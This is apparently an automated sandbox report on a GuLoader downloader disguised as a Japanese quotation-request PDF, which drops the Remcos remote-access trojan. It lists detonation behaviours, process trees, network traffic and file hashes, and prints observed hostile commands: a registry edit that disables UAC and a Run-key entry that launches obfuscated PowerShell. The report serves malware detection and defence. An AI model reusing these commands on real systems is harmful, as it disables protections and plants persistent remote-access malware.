Malware Analysis Report

2025-06-16 03:44

Sample ID 240325-d9zk1aab3v
Target 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip
SHA256 903ab5d44a560508bd22ad1dd43fb10e603f1cdc7478dbec70f58c772294f56c
Tags guloader downloader evasion persistence trojan
Score 10/10

Analysis Overview

Threat Level: Known bad

The file 見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.zip was found to be: Known bad.

Malicious Activity Summary

guloader downloader evasion persistence trojan

UAC bypass

Guloader,Cloudeye

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-25 03:43

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-25 03:43

Reported

2024-03-25 03:53

Platform

win10v2004-20240226-ja

Max time kernel

522s

Max time network

442s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\ProgramData\Remcos\remcos.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\\Hooves\\').Handelsordreregistret;%Melaxuma% ($Ladys)" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\"" C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4732 set thread context of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000_Classes\Local Settings C:\ProgramData\Remcos\remcos.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1916 wrote to memory of 2320 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1916 wrote to memory of 2320 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 2888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2320 wrote to memory of 2888 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4732 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 2092 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4732 wrote to memory of 4280 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3540 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3540 wrote to memory of 5096 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3080 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 4280 wrote to memory of 3128 N/A C:\Program Files (x86)\windows mail\wab.exe C:\ProgramData\Remcos\remcos.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3080 wrote to memory of 4312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\ProgramData\Remcos\remcos.exe

"C:\ProgramData\Remcos\remcos.exe"

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.169.78:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 78.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 1.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 104.241.123.92.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 176.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
GB 172.217.169.78:443 drive.google.com tcp
GB 142.250.180.1:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5ba2szg4.xm2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\ProgramData\Remcos\remcos.exe

MD5 251e51e2fedce8bb82763d39d631ef89
SHA1 677a3566789d4da5459a1ecd01a297c261a133a2
SHA256 2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9
SHA512 3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521
